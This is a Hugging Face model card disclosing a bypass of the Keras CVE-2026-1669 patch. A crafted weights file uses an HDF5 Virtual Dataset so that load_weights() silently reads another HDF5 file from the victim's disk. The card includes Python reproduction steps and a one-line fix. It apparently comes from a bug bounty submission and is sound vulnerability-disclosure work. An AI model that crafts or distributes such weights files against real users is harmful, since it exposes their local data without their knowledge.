Hugging Face's logo

jdhart81
/
keras-vds-cve-2026-1669-bypass

Keras
security
poc
hdf5
Model card Files
xet
 Community

KERAS-VDS-001: CVE-2026-1669 Patch Bypass via HDF5 Virtual Datasets

Reporter: Viridis Security (viridisnorthllc@gmail.com)
Severity: High | CVSS 7.8 | CWE-610
Affected: Keras 3.13.2 (latest β€” intended CVE-2026-1669 fix)

What this file is

malicious_vds.weights.h5 is a crafted Keras weights file containing an HDF5 Virtual Dataset (VDS) in its vars/ group. When loaded via model.load_weights() on Keras 3.13.2, it bypasses the CVE-2026-1669 patch and silently reads data from an arbitrary HDF5 file on the victim filesystem.

The Bypass

Keras 3.13.2 patches CVE-2026-1669 by checking dataset.external in _verify_dataset(). HDF5 Virtual Datasets use dataset.is_virtual β€” a completely different property β€” and return dataset.external = None (falsy). The patch guard never fires.

Mechanism h5py property Value for VDS Patch catches?
ExternalStorage dataset.external None ← falsy βœ… (patched)
Virtual Dataset dataset.is_virtual True ❌ bypass

Reproduce (Colab / local Python) 

# Step 1: Create victim file (represents any HDF5 data on victim disk)
import h5py, numpy as np
with h5py.File("victim_sensitive.h5", "w") as f:
    f.create_dataset("secret_weights", data=np.arange(64, dtype=np.float32) * 1.337)
    f.attrs["canary"] = "VIRIDIS_CANARY_VDS_001"

# Step 2: Load malicious weights β€” no exception raised on Keras 3.13.2
import keras
model = keras.Sequential([keras.layers.Dense(1, input_shape=(64,), use_bias=False)])
model.build((None, 64))
model.load_weights("malicious_vds.weights.h5")   # ← triggers VDS read
print(model.layers[0].kernel.numpy().flatten()[:4])
# Output: [ 0.  1.337  2.674  4.011 ] β€” data from victim_sensitive.h5

The VDS in this file points to victim_sensitive.h5::secret_weights. The path is relative β€” it resolves from the current working directory when load_weights() is called.

Fix

Add dataset.is_virtual check in keras/src/saving/saving_lib.py:

if dataset.is_virtual:
    raise ValueError("Not allowed: H5 file Dataset with virtual sources (VDS)")

Submitted to huntr.dev MFV program | Viridis Security

Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support